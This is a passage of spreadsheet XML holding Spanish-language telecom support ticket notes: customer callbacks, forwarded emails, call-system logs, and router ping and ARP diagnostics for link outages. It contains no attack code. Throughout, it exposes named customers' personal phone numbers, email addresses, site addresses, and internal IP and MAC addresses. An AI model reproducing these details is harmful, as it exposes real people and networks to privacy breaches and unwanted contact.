    <t>F4584404</t>
  </si>
  <si>
    <t>SE VUELVE A ENVIAR CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
MIÉ 01/06/2022 5:05 P.M.
ELEMENTOS ENVIADOS; BANDEJA DE ENTRADA
PARA:
CARLOS FELIPE VELASQUEZ CRISTAL;
SERVICEDESKTI&lt;SERVICEDESK@GRUPOMONGE.COM&gt;;
TELECOMUNICACIONES@GRUPOMONGE.COM;
CARLOS.LEAL@GRUPOMONGE.COM;
TI_GT&lt;TI_GT@GRUPOMONGE.COM&gt;;
JOSUE ALEJANDRO HERRERA SALAZAR;
CC:
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTONIO;
CLIENTESCORPORATIVOS;
JOSE RODOLFO ESTRADA MUÑOZ;
BUEN DIA, ESTIMADOS:
        ¿RESPECTO AL SEGUIMIENTO DEL ENLACE, SE OBSERVA DOWN EL SERVICIO CONTARÁN  CON ALGUNA INFORMACION ADICIONAL DEL ENLACE O BIEN INDICARNOS LOS CONTACTOS DEL PUNTO REMOTO,
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>OSUE ALEJANDRO HERRERA SALAZAR
VIE 03/06/2022 8:25 A.M.
BANDEJA DE ENTRADA
PARA:
CARLOS FELIPE VELASQUEZ CRISTAL;
JUAN PABLO MORALES BARRONDO;
SERVICEDESKTI&lt;SERVICEDESK@GRUPOMONGE.COM&gt;;
TELECOMUNICACIONES@GRUPOMONGE.COM;
CARLOS.LEAL@GRUPOMONGE.COM;
TI_GT&lt;TI_GT@GRUPOMONGE.COM&gt;;
CC:
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTONIO;
CLIENTESCORPORATIVOS;
JOSE RODOLFO ESTRADA MUÑOZ;
BUENOS DÍAS,
ESTE ENLACE DE DATOS SE DIO DE BAJA PORQUE SE CAMBIÓ A ENLACE DE INTERNET.
SALUDOS,</t>
  </si>
  <si>
    <t>F4584406</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ALEJANDRO DUARTE/CLIENTE INDICA QUE ESTE MOMENTO PRESENTA EL PROBLEMA REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE; VÍA TELEFÓNICA APOYA LUIS MORALES/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN VIENDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLANDO 55103867 MENCIONA QUE NO TUVIERON ENERGIA ELECTRICA POR CASI 24 HORAS POR LO QUE NO HAN PODIDO REALIZAR LAS PRUEBAS
CLIENTE SOLICITA LLAMADA PARA EL DIA LUNES A LAS 11:00HRS
-ID 1001141019</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLANDO 55103867 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO NECESITAN REALIZAR PRUEBAS YA QUE EL INCONVENIENTE LO PRESENTAN EN LA NOCHE
CLIENTE SOLICITA LLAMDA PARA MAÑANA A LAS 15:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 3001939742</t>
  </si>
  <si>
    <t>F4584413</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO AZUCENA AL 78591523 INDICA QUE AUN CUENTA CON EL ENLACE CAIDO ||SE NOTIFICA A AGESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001330964
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO AZUCENA AL 78591523 NO RESPONDE ENVIA A BUZON **
ID 3001367051 - 3001367210
**</t>
  </si>
  <si>
    <t>F4584414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIEINTE ALICIA CHAVARRIA-78553845</t>
  </si>
  <si>
    <t>SE LLAMA A CLIEINTE ALICIA CHAVARRIA-78553845 CONTESTA SEÑOR  WILFREDO MARTINEZ SE CAMBIA ETAPA
3001308035
COLA:
NOMBRE: A: 0050378553845
NÚMERO: 0050378553845
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378553845
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 10:20:33
3001308175
COLA:
NOMBRE: A: 0050378553845
NÚMERO: 0050378553845
DURACIÓN: 0:00:17
ESTADO: MARCANDO
DETALLES: 0050378553845
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 10:20:51</t>
  </si>
  <si>
    <t>F4584425</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE MARISELA PARA COORDINAR VISITA TECNICA PARA EL PROCESO DE MIGRACION E INDICÓ QUE PERSONAL QUE TIENE ACCESO AL RACK DONDE ESTA LA PBX LLEGA EN 2 HORAS SE ENVIO CORREO A PERSONAL DE INGENIERIA PARA QUE PUEDA AVANZAR CON EL PROCESO SE CONTACTARÁ A CLIENTE DENTRO DE 2 HORAS PARA VER SI SU PERSONAL YA ESTÁ EN SITIO PARA COORDINAR VISITA.
BUENAS TARDES, SE COMPARTEN LOS DATOS DEL E1 QUE SERÁ MIGRADO
CLIENTE: DISTRIBUIDORA AGROPECUARIA DYSATYR S A DE C V -
DIRECCION: SAN PEDRO SULA, MEDIA CUADRA ARRIBA DEL SUPERMERCADO JUNIOR #2
GDN: 25647940
SERVICIO ACTUALMENTE SALE DE SPS2
SERVICIO SE UBICA EN SPS2
18	25647940_DYSATYR	18	ESTABLISHED	11363	11363
CONTACTO EN EL SITIO ES:
CONTACTO: MARISELA
TELEFONO: 95758039
EL HORARIO DE ATENCION ES DE 7AM A 12PM Y DE 1PM A 5PM, CLIENTE COMENTA QUE SE PUEDE LLEGAR HOY EN LA TARDE PARA TRABAJAR EL SERVICIO YA QUE LES URGE.¿
SOLICITAMOS NOS PUEDAN ENVIAR LA INGENIERÍA DE COMO QUEDARÁ EL SERVICIO, Y LOS DATOS DEL TÉCNICO ASIGNADO (NOMBRE Y TELEFONO)
SALUDOS
JOSE LUIS ALVAREZ
ACCESOS EMPRESARIALES
CLARO.</t>
  </si>
  <si>
    <t>F4584432</t>
  </si>
  <si>
    <t>SE LOGRA CONTACTAR CON ANGELICA BONILLA 50686733592, SE LE COMENTA QUE SE REALIZARON PRUEBAS DE TRAZAS EN DONDE SE VERIFICÓ QUE EL AETHRA ENVIA LA LLAMADA A AMBOS NÚMEROS 44042300 Y 44042301, PERO EL GDN NO RESPONDE Y LA EXTENSIÓN SÍ RESPONDE. POR LO QUE ES NECESARIO QUE VERIFIQUEN LA CONFIGURACIÓN DE SU PLANTA PBX YA QUE POSIBLEMENTE EL GDN NO ESTÉ CONFIGURADO CORRECTAMENTE. CLIENTE ENTERADA, DARÁ SEGUIMIENTO CON SU PROVEEDOR. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050686733592
NÚMERO: 0050686733592
INICIO: HOY, 01:44 P. M.
FIN: HOY, 01:49 P. M.
DURACIÓN: 4:24
ID DE LLAMADA: 3001385278</t>
  </si>
  <si>
    <t>INFORMA CLIENTE ANGELICA BONILLA 506  86733592 QUE SUS LLAMADAS ESTAN INGRESANDO A LA EXTENSIÓN 44042301 Y NO AL GDN 44042300, LLAMADAS A LA EXTENSIÓN COMPLETAN Y AL GDN NO COMPLETAN.</t>
  </si>
  <si>
    <t>F4584433</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLENDA DE SERMEÑO AL 30533557 - 47403689 INDICA QUE ESTA EN LINEA CON EL AGENTE ALEJANDRO QUE LE ESTA DANDO APOYO **
ID 3001334375 - 3001334551
**</t>
  </si>
  <si>
    <t>F4584445</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REINALDO LOVO 95224748 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001335235</t>
  </si>
  <si>
    <t>F4584447</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE 45787911 SOLICITA SE PUEDA COMPARTIR LOS LOGS POR CORREO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001336968</t>
  </si>
  <si>
    <t>F4584448</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SURIA 32583676 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001345736</t>
  </si>
  <si>
    <t>F4584452</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GUILLERMO HERNANDEZ AL 85776372 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001338153
**</t>
  </si>
  <si>
    <t>F4584462</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS CASTELLON 86164428 PARA SOLICITAR DATS DE VISITA
-ID 3001324238 - 3001328379
UBICACIÓN:KILOMETRO 149.8 CARRETERA MATAGALPA
CONTACTO EN SITIO: LUIS CASTELLON 86164428
HORARIO DE ATENCION:HASTA LAS 16:00 HRS
GESTIÓN DE PERMISOS:UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4584479</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
F4584479 || ID1063013SV
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE, POR ESTE MEDIO ADJUNTO LAS PRUEBAS SOLICITADAS CON RESPECTO AL ENLACE CON ID: ID1063013SV UBICADO EN  CAMOTEPEQUE / NEJAPA CASERIO EL LLANO CALLE PRINCIPAL BO. CONCEPCION.
PRUEBAS DE PING HACIA LA IP WAN DEL ROUTER
PING -C 1500 -S 1500 -M 55 -B -VPN-INSTANCE INTERNET_ID_ESV 10.131.188.133
  PING 10.131.188.133: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.131.188.133 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 8/17/329 MS
PRUEBAS DE PING HACIA INTERNET DESDE EL ROUTER
ID1063013#PING 1.1.1.1 SOURCE VLAN 1 RE 1500 SI 500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 500-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.86.234.134
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (1499/1500), ROUND-TRIP MIN/AVG/MAX = 52/60/364 MS
EQUIPOS CONECTADOS Y CONSUMO POR PARTE DE SU RED LAN
ID1063013#SHOW IP ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.131.188.133          -   44B6.BEB9.C280  ARPA   GIGABITETHERNET0/0/0.1648
INTERNET  10.131.188.134         11   F063.F937.95CC  ARPA   GIGABITETHERNET0/0/0.1648
INTERNET  190.86.234.130          0   INCOMPLETE      ARPA
INTERNET  190.86.234.131          0   E055.3D4C.9264  ARPA   VLAN1
INTERNET  190.86.234.133          0   INCOMPLETE      ARPA
INTERNET  190.86.234.134          -   44B6.BEB9.C2F4  ARPA   VLAN1
ID1063013#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9495  15245000      1458    811000       774         0
* GI0/0/0.1648                  -         -         -         -         -         -         -         -         -
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/1/0          0         0         0         0    793000       777  14571000      1399         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0    777000       789  14667000      1403         0
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO PEÑA 77493031 CLIENTE SOLICITA LAS PRUEBAS DE DIAGNOSTICO POR CORREO
-- MPENA@MIDES.COM.SV --
-ID 3001352991</t>
  </si>
  <si>
    <t>F4584489</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JOSE LUIS RUBIO 40484749 PARA REALIZAR PRUEBAS PERO NOS SIGUE ENVIANDO A BUZON
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA, NOS ENVIA A BUZON EN VARIAS OCASIOENS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON  CLIENTE JOSE LUIS RUBIO 40484749
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JOSE LUIS RUBIO 40484749 PARA VALIDAR SI YA TERMINO SU HORA DE ALMUERZO PERO NOS ENVIA A BUZON
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE JOSE LUIS RUBIO E INDICÓ QUE EQUIPO PANDATEL ESTA ENCENDIDO CON LUZ DE LINK EN VERDE FIJA, SE SOLICITÁ VISITA TECNICA PARA EL CHEQUEO DEL PROBLEMA CON EL SERVICIO.</t>
  </si>
  <si>
    <t>F4584493</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 17:42
PARA: RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; YOSELIN DAYRIELA MONTES MUNGUIA &lt;YOSELIN.MONTES@HN.ASESOREXTERNOCA.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: G-NOC HON &lt;NOC@BACCREDOMATIC.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE AFECTADO - AGENCIA INTERNET MERAKI AG ESTE SPS
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE A LA ESPERA DE VALIDACION.
RE: ENLACE AFECTADO - AGENCIA INTERNET MERAKI AG ESTE SPS</t>
  </si>
  <si>
    <t>SE LE CONTESTA CORREO A CLIENTE, A LA ESPERA DE RESPUESTA.
RE: ENLACE AFECTADO - AGENCIA INTERNET MERAKI AG ESTE SPS</t>
  </si>
  <si>
    <t>F4584505</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SIMIRA SAZO AL 22217718  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001345575
**</t>
  </si>
  <si>
    <t>F4584506</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCELA CUBIAS 77449882  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001605294 - 3001605804</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MARCELA CUBIAS 77449882 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, PERO SOLICITA LLAMADA EL DÍA DE MAÑANA A LAS 10:00 HORAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSÉ ARIAS 78556163 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001696276</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   MARCELA CUBIAS 77449882 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001693745 - 3001694059</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARCELA CUBIAS 77449882 NO RESPONDE SE INTENTARA LUEGO
-ID 3001666261 - 3001666616</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCELA CUBIAS 77449882  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001613950
**</t>
  </si>
  <si>
    <t>F4584508</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEVIN VÉLIZ AL 55719640 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001957429
**</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A FRANCISCO QUEZADA/GESTOR CNOC VÍA TELEFÓNICA, VALIDANDO CRONO ANTERIOR, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4584535</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 17:46
PARA: LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; 'TATIANA MOLINA' &lt;JESSICAT.MOLINA@CLARO.COM.SV&gt;; 'SOPORTE N1 CNOC' &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: GALDAMEZ MURCIA, ALMA DOLORES &lt;GALDAMEZ.ALMA@CLARO.COM.SV&gt;; REDESBC@BANCOCUSCATLAN.COM &lt;REDESBC@BANCOCUSCATLAN.COM&gt;; 'MARLON AMAYA' &lt;MARLON.ALVARENGA@BANCOCUSCATLAN.COM&gt;; ZZ_CC_AAA &lt;ZZ_CC_AAA@CLARO.COM.SV&gt;
ASUNTO: RE: PROBLEMAS CON INTERNET AGENCIA CONSTITUCIÓN ID1035040
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4584542</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A CLIENTE SOLICITANDO PERMISOS**
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 13:58
PARA: TIC - DIRECCION DE TELECOMUNICACIONES (LISTA) &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || SD1130728 || 8902366T .</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA ANIBAL GONZALEZ PARA AVANCES DE LA F4584542 EN PC, SE VALIDA QUE A NIVEL LÓGICO NO HAY INCONVENIENTES SOLO SE OBSERVA REINICIO DEL EQUIPO, CLIENTE INDICA QUE DESEA QUE SE LE HAGA VISITA TÉCNICA PORQUE TIENE ESTE MISMO PROBLEMA DESDE AYER, INDICA QUE PREFIERE QUE SE LES ENVÍE TECNICO A REVISAR, SE PROCEDE A LOCALIZAR A GESTOR WAGENER POLANCO ID: 3001364855 Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*</t>
  </si>
  <si>
    <t>F4584555</t>
  </si>
  <si>
    <t>SE HABLA NUEVAMENTE CON BERNABE Y CONFIRMA QUE NO CUENTAN CON ENERGÍA EN SITIO || ENLACE EN OBSERVACIÓN.
3001366656
COLA:
NOMBRE: A: 40713148
NÚMERO: 40713148
DURACIÓN: 0:01:09
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 40713148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 31/05/2022 12:46:11</t>
  </si>
  <si>
    <t>F4584566</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR OSMIN FLORES GUERRA-32606339 INDICA QUE APLICO REINICIO A SU PBX Y SERVICIO RESTABLECIO ##
3001345764
COLA:
NOMBRE: A: 0050432606339
NÚMERO: 0050432606339
DURACIÓN: 0:01:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050432606339
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 11:53:59</t>
  </si>
  <si>
    <t>F4584571</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO OP108 ALARMADO, LO REINICIA PERO CONTINÍA EN EL MISMO ESTADO, SE ABRIRÁ WO
PWR      VERDE
CH1,CH2,CH3  ROJO</t>
  </si>
  <si>
    <t>F4584605</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN MARTINEZ AL 84974717 INDCIA QUE PERSISTE EL INCONVENEINTE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001392878
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN MARTINEZ AL 84974717  NO RESPONDE ENVIA DIRECTO A BUZON
SE INTENTARA LUEGO **
ID 3001381678
**</t>
  </si>
  <si>
    <t>F4584606</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23049696 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001395200</t>
  </si>
  <si>
    <t>F4584608</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR NOE QUIEN SOLICITA QUE SE LE ENVIE CORREO  YA QUE EL ULTIMO SEGUIMIENTO POR CORREO FUE EL DE SOFIA || SE NOTIFICA A GESTOR **
ID 3001379061
**</t>
  </si>
  <si>
    <t>F4584609</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO COZ  35654073 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE HACE MENCION QUE EN PR EL TECNICO DEJO ALGUNOS CABLES PERO NO BRINDA MAYOR INFORMACION E INDICA QUE SE QUEDE ASI YA QUE TIENE OTRA LLAMADA Y NO PUEDE ATENDER
-ID 3001838307</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO COZ  35654073 NO RESPONDE, SE INTETARA LUEGO
-ID 3001823128 - 3001823534</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JULIO COZ  35654073 MENCIONA QUE NO SE ENCUENTRA EN LA OFICINA POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS  10:00
-ID 3001711643</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO COZ  35654073 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA LLAMADA PARA LAS 16:30
-ID 3001547212</t>
  </si>
  <si>
    <t>F4584615</t>
  </si>
  <si>
    <t>SE DETIENEN ESCALACIONES INCIDENTE CAUSADO POR CLIENTE QUIEN CAMBIA DE EQUIPO FORTINET CLARO POR UNO DE EL, Y DESCONECTA TODO, SERVICIO ACTIVO SE VALIDA ANCHO DE BANDA Y ESTABLIDAD PEDRO TOT EN CAMPO</t>
  </si>
  <si>
    <t>TECNICOS DEBEN DE LLEGAR IDENTIFICADOS Y LES DARAN ACCESO Y SIEMPRE LLAMAR A CLIENTE 55566865 MARIO GUERRA</t>
  </si>
  <si>
